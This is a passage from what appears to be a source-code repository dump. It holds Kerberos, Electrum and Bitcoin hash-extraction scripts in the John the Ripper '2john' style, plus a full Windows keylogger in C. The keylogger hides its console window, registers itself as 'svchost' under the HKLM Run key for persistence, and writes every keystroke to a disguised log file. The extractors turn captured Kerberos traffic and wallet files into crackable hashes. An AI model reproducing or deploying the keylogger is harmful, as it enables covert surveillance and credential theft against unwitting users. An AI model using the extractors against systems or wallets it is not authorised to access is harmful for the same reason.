msg.xpath('.//field[@name="kerberos.kdc_req_body"]//field[@name="kerberos.realm"]') or msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.realm"]') 91 | if not r: 92 | continue 93 | if isinstance(r, list): 94 | r = r[0] 95 | realm = r.attrib["show"] 96 | 97 | # locate cname 98 | r = msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.KerberosString"]') or msg.xpath('.//field[@name="kerberos.kdc_req_body"]//field[@name="kerberos.name_string"]') or msg.xpath('.//field[@name="kerberos.req_body_element"]//field[@name="kerberos.CNameString"]') 99 | if r: 100 | if isinstance(r, list): 101 | r = r[0] 102 | user = r.attrib["show"] 103 | 104 | if user == "": 105 | user = binascii.unhexlify(salt) 106 | 107 | # user, realm and salt are unused when etype is 23 ;) 108 | checksum = PA_DATA_ENC_TIMESTAMP[0:32] 109 | enc_timestamp = PA_DATA_ENC_TIMESTAMP[32:] 110 | if etype == "23": # user:$krb5pa$etype$user$realm$salt$HexTimestampHexChecksum 111 | sys.stdout.write("%s:$krb5pa$%s$%s$%s$%s$%s%s\n" % (user, 112 | etype, user, realm, salt, 113 | enc_timestamp, 114 | checksum)) 115 | else: 116 | if not salt: 117 | sys.stderr.write("[-] Hash might be broken, etype != 23 and salt not found!\n") 118 | sys.stdout.write("%s:$krb5pa$%s$%s$%s$%s$%s\n" % (user, 119 | etype, user, realm, salt, 120 | PA_DATA_ENC_TIMESTAMP)) 121 | 122 | for msg in messages: # extract hashes from TGS-REP messages 123 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 124 | if not r: 125 | continue 126 | if isinstance(r, list): 127 | r = r[0] 128 | message_type = r.attrib["show"] 129 | if message_type == "13": # Kerberos TGS_REP 130 | spnps = msg.xpath('.//field[@name="kerberos.SNameString"]') # is this robust enough? 131 | spn = "Unknown" 132 | if isinstance(spnps, list): 133 | out = [] 134 | for spnp in spnps: 135 | out.append(spnp.attrib["show"]) 136 | spn = "/".join(out) 137 | # locate the hash 138 | rs = msg.xpath('.//field[@name="kerberos.enc_part_element"]') 139 | if not rs: 140 | continue 141 | if isinstance(rs, list): 142 | idx = 0 143 | multiple_entries = False 144 | if len(rs) >= 2: # this is typically 2 145 | multiple_entries = True 146 | for r in rs: 147 | if multiple_entries and idx != 0: # only generate hash for the first "kerberos.enc_part_element", is this always correct? 148 | idx = idx + 1 149 | continue 150 | idx = idx + 1 151 | v = r.xpath('.//field[@name="kerberos.etype"]') 152 | if isinstance(v, list): 153 | v = v[0] 154 | etype = v.attrib["show"] 155 | v = r.xpath('.//field[@name="kerberos.cipher"]') 156 | if isinstance(v, list): 157 | v = v[0] 158 | data = v.attrib["value"] 159 | if etype != "23": 160 | sys.stderr.write("Currently unsupported etype %s found!\n" % etype) 161 | else: 162 | sys.stdout.write("%s:$krb5tgs$%s$%s$%s\n" % (spn, etype, data[:32], data[32:])) 163 | 164 | for msg in messages: # extract hashes from AS-REP messages 165 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 166 | if not r: 167 | continue 168 | if isinstance(r, list): 169 | r = r[0] 170 | message_type = r.attrib["show"] 171 | 172 | if message_type == "11": # Kerberos AS-REP 173 | s = msg.xpath('.//field[@name="kerberos.salt"]') # is this valid for M$ AD too? 174 | # locate the hash 175 | rs = msg.xpath('.//field[@name="kerberos.enc_part_element"]') 176 | if not rs: 177 | continue 178 | if isinstance(rs, list): 179 | idx = 0 180 | multiple_entries = False 181 | if len(rs) >= 2: # this is typically 2 182 | multiple_entries = True 183 | for r in rs: 184 | if multiple_entries and idx == 0: # skip over the first entry, is this always correct? 185 | idx = idx + 1 186 | continue 187 | idx = idx + 1 188 | v = r.xpath('.//field[@name="kerberos.etype"]') 189 | if isinstance(v, list): 190 | v = v[0] 191 | etype = v.attrib["show"] 192 | if etype != "23": 193 | if s is None: 194 | sys.stderr.write("Unable to find kerberos.salt value. Please report this bug to us!\n") 195 | continue 196 | if isinstance(s, list): 197 | if len(s) == 0: 198 | sys.stderr.write("Unable to find kerberos.salt value. Please report this bug to us!\n") 199 | continue 200 | s = s[0] 201 | salt = s.attrib["show"] 202 | v = r.xpath('.//field[@name="kerberos.cipher"]') 203 | if isinstance(v, list): 204 | v = v[0] 205 | data = v.attrib["value"] 206 | if etype != "23": 207 | sys.stdout.write("$krb5asrep$%s$%s$%s$%s\n" % (etype, salt, data[0:-24], data[-24:])) 208 | else: 209 | sys.stdout.write("$krb5asrep$%s$%s$%s\n" % (etype, data[0:32], data[32:])) 210 | 211 | if __name__ == "__main__": 212 | if len(sys.argv) < 2: 213 | sys.stdout.write("Usage: %s <.pdml files>\n" % sys.argv[0]) 214 | sys.stdout.write("\ntshark -r sample.pcap -T pdml > sample.pdml; %s sample.pdml\n" % sys.argv[0]) 215 | sys.exit(1) 216 | 217 | for i in range(1, len(sys.argv)): 218 | process_file(sys.argv[i]) 219 | -------------------------------------------------------------------------------- /electrum2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2017, Dhiru Kholia 4 | # and it is hereby released under GPL v2 license. 5 | # 6 | # Major parts are borrowed from the "btcrecover" program which is, 7 | # Copyright (C) 2014-2016 Christopher Gurnee and under GPL v2. 8 | # 9 | # See https://github.com/gurnec/btcrecover for details. 10 | # 11 | # References, 12 | # 13 | # https://github.com/gurnec/btcrecover/blob/master/btcrecover/btcrpass.py 14 | # https://github.com/spesmilo/electrum (see 1.9.8 version) 15 | 16 | import os 17 | import sys 18 | # import traceback 19 | import base64 20 | import binascii 21 | import itertools 22 | import optparse 23 | 24 | try: 25 | import json 26 | assert json 27 | except ImportError: 28 | try: 29 | sys.path.append(".") 30 | import simplejson as json 31 | except ImportError: 32 | sys.stderr.write("Please install json / simplejson module which is currently not installed.\n") 33 | sys.exit(-1) 34 | 35 | 36 | def process_electrum28_wallets(bname, data, options): 37 | version = 4 # hack 38 | MIN_LEN = 37 + 32 + 32 # header + ciphertext + trailer 39 | if len(data) < MIN_LEN * 4 / 3: 40 | sys.stderr.write("%s: Electrum 2.8+ wallet is too small to parse!\n" % bname) 41 | return 42 | data = base64.b64decode(data) 43 | ephemeral_pubkey = data[4:37] # compressed representation 44 | # ciphertext = data[37:-32] 45 | mac = data[-32:] 46 | all_but_mac = data[:-32] 47 | if len(all_but_mac) > 16384 or options.truncate: 48 | sys.stderr.write("Forcing generation of truncated hash, this is not tested well!\n") 49 | all_but_mac = data[37:][:1024] # skip over the 4-byte magic & 33-byte pubkey 50 | version = 5 # hack 51 | ephemeral_pubkey = binascii.hexlify(ephemeral_pubkey).decode("ascii") 52 | mac = binascii.hexlify(mac).decode("ascii") 53 | all_but_mac = binascii.hexlify(all_but_mac).decode("ascii") 54 | sys.stdout.write("%s:$electrum$%d*%s*%s*%s\n" % (bname, version, ephemeral_pubkey, all_but_mac, mac)) 55 | 56 | 57 | def process_file(filename, options): 58 | bname = os.path.basename(filename) 59 | try: 60 | f = open(filename, "rb") 61 | data = f.read() 62 | except IOError: 63 | e = sys.exc_info()[1] 64 | sys.stderr.write("%s\n" % str(e)) 65 | return 66 | 67 | # detect Electrum 2.7+ encrypted wallets 68 | try: 69 | if base64.b64decode(data).startswith('BIE1'): 70 | # sys.stderr.write("%s: Encrypted Electrum 2.8+ wallets are not supported yet!\n" % bname) 71 | process_electrum28_wallets(bname, data, options) 72 | return 73 | except: 74 | # traceback.print_exc() 75 | pass 76 | 77 | try: 78 | data = data.decode("utf-8") 79 | except: 80 | e = sys.exc_info()[1] 81 | sys.stderr.write("%s\n" % str(e)) 82 | return -13 83 | 84 | version = None 85 | try: 86 | wallet = json.loads(data) 87 | except: 88 | try: 89 | from ast import literal_eval # hack for Electrum 1.x wallets 90 | wallet = literal_eval(data) 91 | version = 1 92 | except: 93 | sys.stderr.write("%s: Unable to parse the wallet file!\n" % bname) 94 | # traceback.print_exc() 95 | return 96 | 97 | # This check applies for both Electrum 2.x and 1.x 98 | if "use_encryption" in wallet and wallet.get("use_encryption") == False: 99 | sys.stderr.write("%s: Electrum wallet is not encrypted!\n" % bname) 100 | return 101 | 102 | # Is this an upgraded wallet, from 1.x to 2.y (y<7)? 103 | if "wallet_type" in wallet and wallet["wallet_type"] == "old": 104 | sys.stderr.write("%s: Upgraded wallet found!\n" % bname) 105 | version = 1 # hack 106 | 107 | if version == 1: 108 | try: 109 | seed_version = wallet["seed_version"] 110 | seed_data = base64.b64decode(wallet["seed"]) 111 | if len(seed_data) != 64: 112 | sys.stderr.write("%s: Weird seed length value '%d' found!\n" % (bname, len(seed_data))) 113 | return 114 | if seed_version == 4: 115 | iv = seed_data[:16] 116 | encrypted_data = seed_data[16:32] 117 | iv = binascii.hexlify(iv).decode("ascii") 118 | encrypted_data = binascii.hexlify(encrypted_data).decode("ascii") 119 | sys.stdout.write("%s:$electrum$1*%s*%s\n" % (bname, iv, encrypted_data)) 120 | return 121 | else: 122 | sys.stderr.write("%s: Unknown seed_version value '%d' found!\n" % (bname, seed_version)) 123 | return 124 | except: 125 | sys.stderr.write("%s: Problem in parsing seed value!\n" % (bname, seed_version)) 126 | return 127 | 128 | # not version 1 wallet 129 | wallet_type = wallet.get("wallet_type") 130 | if not wallet_type: 131 | sys.stderr.write("%s: Unrecognized wallet format!\n" % (bname)) 132 | return 133 | if wallet.get("seed_version") not in (11, 12, 13) and wallet_type != "imported": # all 2.x versions as of Oct 2016 134 | sys.stderr.write("%s: Unsupported Electrum2 seed version '%d' found!\n" % (bname, seed_version)) 135 | return 136 | xprv = None 137 | version = 2 # hack 138 | while True: # "loops" exactly once; only here so we've something to break out of 139 | # Electrum 2.7+ standard wallets have a keystore 140 | keystore = wallet.get("keystore") 141 | if keystore: 142 | keystore_type = keystore.get("type", "(not found)") 143 | 144 | # Wallets originally created by an Electrum 2.x version 145 | if keystore_type == "bip32": 146 | xprv = keystore.get("xprv") 147 | if xprv: 148 | break 149 | 150 | # Former Electrum 1.x wallet after conversion to Electrum 2.7+ standard-wallet format 151 | elif keystore_type == "old": 152 | seed_data = keystore.get("seed") 153 | if seed_data: 154 | # Construct and return a WalletElectrum1 object 155 | seed_data = base64.b64decode(seed_data) 156 | if len(seed_data) != 64: 157 | raise RuntimeError("Electrum1 encrypted seed plus iv is not 64 bytes long") 158 | iv = seed_data[:16] # only need the 16-byte IV plus 159 | encrypted_data = seed_data[16:32] # the first 16-byte encrypted block of the seed 160 | version = 1 # hack 161 | break 162 | 163 | # Imported loose private keys 164 | elif keystore_type == "imported": 165 | for privkey in keystore["keypairs"].values(): 166 | if privkey: 167 | privkey = base64.b64decode(privkey) 168 | if len(privkey) != 80: 169 | raise RuntimeError("Electrum2 private key plus iv is not 80 bytes long") 170 | iv = privkey[-32:-16] # only need the 16-byte IV plus 171 | encrypted_data = privkey[-16:] # the last 16-byte encrypted block of the key 172 | version = 3 # dirty hack! 173 | break 174 | if version == 3: # another dirty hack, break out of outer loop 175 | break 176 | else: 177 | sys.stderr.write("%s: found unsupported keystore type!\n" % (bname)) 178 | 179 | # Electrum 2.7+ multisig or 2fa wallet 180 | for i in itertools.count(1): 181 | x = wallet.get("x{}/".format(i)) 182 | if not x: 183 | break 184 | x_type = x.get("type", "(not found)") 185 | if x_type == "bip32": 186 | xprv = x.get("xprv") 187 | if xprv: 188 | break 189 | else: 190 | sys.stderr.write("%s: found unsupported keystore type!\n" % (bname)) 191 | if xprv: 192 | break 193 | 194 | # Electrum 2.0 - 2.6.4 wallet with imported loose private keys 195 | if wallet_type == "imported": 196 | for imported in wallet["accounts"]["/x"]["imported"].values(): 197 | privkey = imported[1] if len(imported) >= 2 else None 198 | if privkey: 199 | privkey = base64.b64decode(privkey) 200 | if len(privkey) != 80: 201 | raise RuntimeError("Electrum2 private key plus iv is not 80 bytes long") 202 | iv = privkey[-32:-16] # only need the 16-byte IV plus 203 | encrypted_data = privkey[-16:] # the last 16-byte encrypted block of the key 204 | version = 3 # dirty hack 205 | break 206 | if version == 3: # another dirty hack, break out of outer loop 207 | break 208 | 209 | # Electrum 2.0 - 2.6.4 wallet (of any other wallet type) 210 | else: 211 | mpks = wallet.get("master_private_keys") 212 | if mpks: 213 | xprv = mpks.values()[0] 214 | break 215 | 216 | raise RuntimeError("No master private keys or seeds found in Electrum2 wallet") 217 | 218 | if xprv: 219 | xprv_data = base64.b64decode(xprv) 220 | if len(xprv_data) != 128: 221 | raise RuntimeError("Unexpected Electrum2 encrypted master private key length") 222 | iv = xprv_data[:16] # only need the 16-byte IV plus 223 | encrypted_data = xprv_data[16:32] # the first 16-byte encrypted block of a master privkey 224 | 225 | iv = binascii.hexlify(iv).decode("ascii") 226 | encrypted_data = binascii.hexlify(encrypted_data).decode("ascii") 227 | 228 | sys.stdout.write("%s:$electrum$%d*%s*%s\n" % (bname, version, iv, encrypted_data)) 229 | f.close() 230 | 231 | 232 | if __name__ == "__main__": 233 | if len(sys.argv) < 2: 234 | sys.stderr.write("Usage: %s [Ethereum Wallet files (default_wallet)]\n" % sys.argv[0]) 235 | sys.exit(-1) 236 | 237 | parser = optparse.OptionParser() 238 | parser.add_option('-t', action="store_true", dest="truncate", help="force generation of truncated hashes") 239 | options, remainder = parser.parse_args() 240 | 241 | for j in range(0, len(remainder)): 242 | process_file(remainder[j], options) 243 | -------------------------------------------------------------------------------- /Keylogger: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | #include 5 | 6 | #include 7 | 8 | 9 | 10 | #define BUFSIZE 80 11 | 12 | 13 | 14 | int test_key(void); 15 | 16 | int create_key(char *); 17 | 18 | int get_keys(void); 19 | 20 | 21 | 22 | 23 | 24 | int main(void) 25 | 26 | { 27 | 28 | HWND stealth; /*creating stealth (window is not visible)*/ 29 | 30 | AllocConsole(); 31 | 32 | stealth=FindWindowA("ConsoleWindowClass",NULL); 33 | 34 | ShowWindow(stealth,0); 35 | 36 | 37 | 38 | int test,create; 39 | 40 | test=test_key();/*check if key is available for opening*/ 41 | 42 | if (test==2)/*create key*/ 43 | 44 | { 45 | 46 | char *path="c:\%windir%\svchost.exe";/*the path in which the file needs to be*/ 47 | 48 | create=create_key(path); 49 | 50 | } int t=get_keys(); 51 | 52 | 53 | 54 | return t; 55 | 56 | } 57 | 58 | 59 | 60 | int get_keys(void) 61 | 62 | { 63 | 64 | short character; 65 | 66 | while(1) 67 | 68 | { 69 | 70 | 71 | 72 | for(character=8;character<=222;character++) 73 | 74 | { 75 | 76 | if(GetAsyncKeyState(character)==-32767) 77 | 78 | { 79 | 80 | FILE *file; 81 | 82 | file=fopen("svchost.log","a+"); 83 | 84 | if(file==NULL) 85 | 86 | { 87 | 88 | return 1; 89 | 90 | } 91 | 92 | if(file!=NULL) 93 | 94 | { 95 | 96 | if((character>=39)&&(character<=64)) 97 | 98 | { 99 | 100 | fputc(character,file); 101 | 102 | fclose(file); 103 | 104 | break; 105 | 106 | } 107 | 108 | else if((character>64)&&(character<91)) 109 | 110 | { 111 | 112 | character+=32; 113 | 114 | fputc(character,file); 115 | 116 | fclose(file); 117 | 118 | break; 119 | 120 | } 121 | 122 | else 123 | 124 | { 125 | 126 | switch(character) 127 | 128 | { 129 | 130 | case VK_SPACE: 131 | 132 | fputc(' ',file); 133 | 134 | fclose(file); 135 | break; 136 | 137 | case VK_SHIFT: 138 | 139 | fputs("[SHIFT]",file); 140 | 141 | fclose(file); 142 | 143 | break; 144 | 145 | case VK_RETURN: 146 | 147 | fputs("n[ENTER]",file); 148 | 149 | fclose(file); 150 | 151 | break; 152 | 153 | case VK_BACK: 154 | 155 | fputs("[BACKSPACE]",file); 156 | 157 | fclose(file); 158 | 159 | break; 160 | 161 | case VK_TAB: 162 | 163 | fputs("[TAB]",file); 164 | 165 | fclose(file); 166 | 167 | break; 168 | 169 | case VK_CONTROL: 170 | 171 | fputs("[CTRL]",file); 172 | 173 | fclose(file); 174 | 175 | break; 176 | 177 | case VK_DELETE: 178 | 179 | fputs("[DEL]",file); 180 | 181 | fclose(file); 182 | 183 | break; 184 | 185 | case VK_OEM_1: 186 | 187 | fputs("[;:]",file); 188 | 189 | fclose(file); 190 | 191 | break; 192 | 193 | case VK_OEM_2: 194 | 195 | fputs("[/?]",file); 196 | 197 | fclose(file); 198 | 199 | break; 200 | 201 | case VK_OEM_3: 202 | 203 | fputs("[`~]",file); 204 | 205 | fclose(file); 206 | 207 | break; 208 | 209 | case VK_OEM_4: 210 | 211 | fputs("[ [{ ]",file); 212 | 213 | fclose(file); 214 | 215 | break; 216 | 217 | case VK_OEM_5: 218 | 219 | fputs("[\|]",file); 220 | 221 | fclose(file); 222 | 223 | break; 224 | 225 | case VK_OEM_6: 226 | 227 | fputs("[ ]} ]",file); 228 | 229 | fclose(file); 230 | 231 | break; 232 | 233 | case VK_OEM_7: 234 | 235 | fputs("['"]",file); 236 | 237 | fclose(file); 238 | 239 | break; 240 | 241 | /*case VK_OEM_PLUS: 242 | 243 | fputc('+',file); 244 | 245 | fclose(file); 246 | 247 | break; 248 | 249 | case VK_OEM_COMMA: 250 | 251 | fputc(',',file); 252 | 253 | fclose(file); 254 | 255 | break; 256 | 257 | case VK_OEM_MINUS: 258 | 259 | fputc('-',file); 260 | 261 | fclose(file); 262 | 263 | break; 264 | 265 | case VK_OEM_PERIOD: 266 | 267 | fputc('.',file); 268 | 269 | fclose(file); 270 | 271 | break;*/ 272 | 273 | case VK_NUMPAD0: 274 | 275 | fputc('0',file); 276 | 277 | fclose(file); 278 | 279 | break; 280 | 281 | case VK_NUMPAD1: 282 | 283 | fputc('1',file); 284 | 285 | fclose(file); 286 | 287 | break; 288 | 289 | case VK_NUMPAD2: 290 | 291 | fputc('2',file); 292 | 293 | fclose(file); 294 | 295 | break; 296 | case VK_NUMPAD3: 297 | 298 | fputc('3',file); 299 | 300 | fclose(file); 301 | 302 | break; 303 | 304 | case VK_NUMPAD4: 305 | 306 | fputc('4',file); 307 | 308 | fclose(file); 309 | 310 | break; 311 | 312 | case VK_NUMPAD5: 313 | 314 | fputc('5',file); 315 | 316 | fclose(file); 317 | 318 | break; 319 | 320 | case VK_NUMPAD6: 321 | 322 | fputc('6',file); 323 | 324 | fclose(file); 325 | 326 | break; 327 | 328 | case VK_NUMPAD7: 329 | 330 | fputc('7',file); 331 | 332 | fclose(file); 333 | 334 | break; 335 | 336 | case VK_NUMPAD8: 337 | 338 | fputc('8',file); 339 | 340 | fclose(file); 341 | 342 | break; 343 | 344 | case VK_NUMPAD9: 345 | 346 | fputc('9',file); 347 | 348 | fclose(file); 349 | 350 | break; 351 | 352 | case VK_CAPITAL: 353 | 354 | fputs("[CAPS LOCK]",file); 355 | 356 | fclose(file); 357 | 358 | break; 359 | 360 | default: 361 | 362 | fclose(file); 363 | 364 | break; 365 | 366 | } 367 | 368 | } 369 | 370 | } 371 | 372 | } 373 | 374 | } 375 | 376 | 377 | 378 | } 379 | 380 | return EXIT_SUCCESS; 381 | 382 | } 383 | 384 | 385 | 386 | int test_key(void) 387 | 388 | { 389 | 390 | int check; 391 | 392 | HKEY hKey; 393 | 394 | char path[BUFSIZE]; 395 | 396 | DWORD buf_length=BUFSIZE; 397 | 398 | int reg_key; 399 | 400 | 401 | 402 | reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0,KEY_QUERY_VALUE,&hKey); 403 | 404 | if(reg_key!=0) 405 | 406 | { 407 | 408 | check=1; 409 | 410 | return check; 411 | 412 | } 413 | 414 | 415 | 416 | reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length); 417 | 418 | 419 | 420 | if((reg_key!=0)||(buf_length>BUFSIZE)) 421 | 422 | check=2; 423 | 424 | if(reg_key==0) 425 | 426 | check=0; 427 | 428 | 429 | 430 | RegCloseKey(hKey); 431 | 432 | return check; 433 | } 434 | 435 | 436 | 437 | int create_key(char *path) 438 | 439 | { 440 | 441 | int reg_key,check; 442 | 443 | 444 | HKEY hkey; 445 | 446 | 447 | 448 | reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",&hkey); 449 | 450 | if(reg_key==0) 451 | 452 | { 453 | 454 | RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path)); 455 | 456 | check=0; 457 | 458 | return check; 459 | 460 | } 461 | 462 | if(reg_key!=0) 463 | 464 | check=1; 465 | 466 | 467 | 468 | return check; 469 | 470 | } 471 | -------------------------------------------------------------------------------- /bitcoin2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # jackjack's pywallet.py 4 | # https://github.com/jackjack-jj/pywallet 5 | # forked from Joric's pywallet.py 6 | 7 | missing_dep = [] 8 | 9 | try: 10 | from bsddb.db import * 11 | except: 12 | from bsddb3.db import * 13 | # missing_dep.append('bsddb') 14 | 15 | import os, sys, time 16 | pyw_filename = sys.argv[0].split('/')[len(sys.argv[0].split('/')) - 1] 17 | pyw_path = os.getcwd() 18 | 19 | try: 20 | import json 21 | except: 22 | try: 23 | import simplejson as json 24 | except: 25 | sys.stdout.write("json or simplejson package is needed") 26 | 27 | import logging 28 | import struct 29 | import traceback 30 | import types 31 | import string 32 | import hashlib 33 | import random 34 | import math 35 | import binascii 36 | 37 | max_version = 81000 38 | addrtype = 0 39 | json_db = {} 40 | private_keys = [] 41 | private_hex_keys = [] 42 | passphrase = "" 43 | global_merging_message = ["", ""] 44 | 45 | wallet_dir = "" 46 | wallet_name = "" 47 | 48 | ko = 1e3 49 | kio = 1024 50 | Mo = 1e6 51 | Mio = 1024 ** 2 52 | Go = 1e9 53 | Gio = 1024 ** 3 54 | To = 1e12 55 | Tio = 1024 ** 4 56 | 57 | prekeys = [binascii.unhexlify("308201130201010420"), binascii.unhexlify("308201120201010420")] 58 | postkeys = [binascii.unhexlify("a081a530"), binascii.unhexlify("81a530")] 59 | 60 | def hash_160(public_key): 61 | md = hashlib.new('ripemd160') 62 | md.update(hashlib.sha256(public_key).digest()) 63 | return md.digest() 64 | 65 | def public_key_to_bc_address(public_key): 66 | h160 = hash_160(public_key) 67 | return hash_160_to_bc_address(h160) 68 | 69 | def hash_160_to_bc_address(h160): 70 | vh160 = chr(addrtype) + h160 71 | h = Hash(vh160) 72 | addr = vh160 + h[0:4] 73 | return b58encode(addr) 74 | 75 | def bc_address_to_hash_160(addr): 76 | bytes = b58decode(addr, 25) 77 | return bytes[1:21] 78 | 79 | __b58chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz' 80 | __b58base = len(__b58chars) 81 | 82 | def b58encode(v): 83 | """ encode v, which is a string of bytes, to base58. 84 | """ 85 | 86 | long_value = 0 87 | for (i, c) in enumerate(v[::-1]): 88 | long_value += (256 ** i) * ord(c) 89 | 90 | result = '' 91 | while long_value >= __b58base: 92 | div, mod = divmod(long_value, __b58base) 93 | result = __b58chars[mod] + result 94 | long_value = div 95 | result = __b58chars[long_value] + result 96 | 97 | # Bitcoin does a little leading-zero-compression: 98 | # leading 0-bytes in the input become leading-1s 99 | nPad = 0 100 | for c in v: 101 | if c == '\0': nPad += 1 102 | else: break 103 | 104 | return (__b58chars[0] * nPad) + result 105 | 106 | def b58decode(v, length): 107 | """ decode v into a string of len bytes 108 | """ 109 | long_value = 0 110 | for (i, c) in enumerate(v[::-1]): 111 | long_value += __b58chars.find(c) * (__b58base ** i) 112 | 113 | result = '' 114 | while long_value >= 256: 115 | div, mod = divmod(long_value, 256) 116 | result = chr(mod) + result 117 | long_value = div 118 | result = chr(long_value) + result 119 | 120 | nPad = 0 121 | for c in v: 122 | if c == __b58chars[0]: nPad += 1 123 | else: break 124 | 125 | result = chr(0) * nPad + result 126 | if length is not None and len(result) != length: 127 | return None 128 | 129 | return result 130 | 131 | # end of bitcointools base58 implementation 132 | 133 | def Hash(data): 134 | return hashlib.sha256(hashlib.sha256(data).digest()).digest() 135 | 136 | # bitcointools wallet.dat handling code 137 | 138 | def create_env(db_dir): 139 | db_env = DBEnv(0) 140 | r = db_env.open(db_dir, (DB_CREATE | DB_INIT_LOCK | DB_INIT_LOG | DB_INIT_MPOOL | DB_INIT_TXN | DB_THREAD | DB_RECOVER)) 141 | return db_env 142 | 143 | def parse_CAddress(vds): 144 | d = {'ip':'0.0.0.0', 'port':0, 'nTime': 0} 145 | try: 146 | d['nVersion'] = vds.read_int32() 147 | d['nTime'] = vds.read_uint32() 148 | d['nServices'] = vds.read_uint64() 149 | d['pchReserved'] = vds.read_bytes(12) 150 | d['ip'] = socket.inet_ntoa(vds.read_bytes(4)) 151 | d['port'] = vds.read_uint16() 152 | except: 153 | pass 154 | return d 155 | 156 | def deserialize_CAddress(d): 157 | return d['ip'] + ":" + str(d['port']) 158 | 159 | def parse_BlockLocator(vds): 160 | d = { 'hashes' : [] } 161 | nHashes = vds.read_compact_size() 162 | for i in xrange(nHashes): 163 | d['hashes'].append(vds.read_bytes(32)) 164 | return d 165 | 166 | def deserialize_BlockLocator(d): 167 | result = "Block Locator top: " + d['hashes'][0][::-1].encode('hex_codec') 168 | return result 169 | 170 | def parse_setting(setting, vds): 171 | if setting[0] == "f": # flag (boolean) settings 172 | return str(vds.read_boolean()) 173 | elif setting[0:4] == "addr": # CAddress 174 | d = parse_CAddress(vds) 175 | return deserialize_CAddress(d) 176 | elif setting == "nTransactionFee": 177 | return vds.read_int64() 178 | elif setting == "nLimitProcessors": 179 | return vds.read_int32() 180 | return 'unknown setting' 181 | 182 | class SerializationError(Exception): 183 | """ Thrown when there's a problem deserializing or serializing """ 184 | 185 | def ts(): 186 | return int(time.mktime(datetime.now().timetuple())) 187 | 188 | def check_postkeys(key, postkeys): 189 | for i in postkeys: 190 | if key[:len(i)] == i: 191 | return True 192 | return False 193 | 194 | def one_element_in(a, string): 195 | for i in a: 196 | if i in string: 197 | return True 198 | return False 199 | 200 | def first_read(device, size, prekeys, inc=10000): 201 | t0 = ts() - 1 202 | try: 203 | fd = os.open (device, os.O_RDONLY) 204 | except: 205 | sys.stdout.write("Can't open %s, check the path or try as root" % device) 206 | exit(0) 207 | prekey = prekeys[0] 208 | data = "" 209 | i = 0 210 | data = os.read (fd, i) 211 | before_contained_key = False 212 | contains_key = False 213 | ranges = [] 214 | 215 | while i < int(size): 216 | if i % (10 * Mio) > 0 and i % (10 * Mio) <= inc: 217 | sys.stdout.write("\n%.2f/%.2f Go" % (i / 1e9, size / 1e9)) 218 | t = ts() 219 | speed = i / (t - t0) 220 | ETAts = size / speed + t0 221 | d = datetime.fromtimestamp(ETAts) 222 | sys.stdout.write(d.strftime(" ETA: %H:%M:%S")) 223 | 224 | try: 225 | data = os.read (fd, inc) 226 | except Exception as exc: 227 | os.lseek(fd, inc, os.SEEK_CUR) 228 | sys.stdout.write(str(exc)) 229 | i += inc 230 | continue 231 | 232 | contains_key = one_element_in(prekeys, data) 233 | 234 | if not before_contained_key and contains_key: 235 | ranges.append(i) 236 | 237 | if before_contained_key and not contains_key: 238 | ranges.append(i) 239 | 240 | before_contained_key = contains_key 241 | 242 | i += inc 243 | 244 | os.close (fd) 245 | return ranges 246 | 247 | def shrink_intervals(device, ranges, prekeys, inc=1000): 248 | prekey = prekeys[0] 249 | nranges = [] 250 | fd = os.open (device, os.O_RDONLY) 251 | for j in range(len(ranges) / 2): 252 | before_contained_key = False 253 | contains_key = False 254 | bi = ranges[2 * j] 255 | bf = ranges[2 * j + 1] 256 | 257 | mini_blocks = [] 258 | k = bi 259 | while k <= bf + len(prekey) + 1: 260 | mini_blocks.append(k) 261 | k += inc 262 | mini_blocks.append(k) 263 | 264 | for k in range(len(mini_blocks) / 2): 265 | mini_blocks[2 * k] -= len(prekey) + 1 266 | mini_blocks[2 * k + 1] += len(prekey) + 1 267 | 268 | 269 | bi = mini_blocks[2 * k] 270 | bf = mini_blocks[2 * k + 1] 271 | 272 | os.lseek(fd, bi, 0) 273 | 274 | data = os.read(fd, bf - bi + 1) 275 | contains_key = one_element_in(prekeys, data) 276 | 277 | if not before_contained_key and contains_key: 278 | nranges.append(bi) 279 | 280 | if before_contained_key and not contains_key: 281 | nranges.append(bi + len(prekey) + 1 + len(prekey) + 1) 282 | 283 | before_contained_key = contains_key 284 | 285 | os.close (fd) 286 | 287 | return nranges 288 | 289 | def find_offsets(device, ranges, prekeys): 290 | prekey = prekeys[0] 291 | list_offsets = [] 292 | to_read = 0 293 | fd = os.open (device, os.O_RDONLY) 294 | for i in range(len(ranges) / 2): 295 | bi = ranges[2 * i] - len(prekey) - 1 296 | os.lseek(fd, bi, 0) 297 | bf = ranges[2 * i + 1] + len(prekey) + 1 298 | to_read += bf - bi + 1 299 | buf = "" 300 | for j in range(len(prekey)): 301 | buf += "\x00" 302 | curs = bi 303 | 304 | while curs <= bf: 305 | data = os.read(fd, 1) 306 | buf = buf[1:] + data 307 | if buf in prekeys: 308 | list_offsets.append(curs) 309 | curs += 1 310 | 311 | os.close (fd) 312 | 313 | return [to_read, list_offsets] 314 | 315 | def read_keys(device, list_offsets): 316 | found_hexkeys = [] 317 | fd = os.open (device, os.O_RDONLY) 318 | for offset in list_offsets: 319 | os.lseek(fd, offset + 1, 0) 320 | data = os.read(fd, 40) 321 | hexkey = data[1:33].encode('hex') 322 | after_key = data[33:39].encode('hex') 323 | if hexkey not in found_hexkeys and check_postkeys(after_key.decode('hex'), postkeys): 324 | found_hexkeys.append(hexkey) 325 | 326 | os.close (fd) 327 | 328 | return found_hexkeys 329 | 330 | 331 | def md5_2(a): 332 | return hashlib.md5(a).digest() 333 | 334 | def md5_file(nf): 335 | fichier = file(nf, 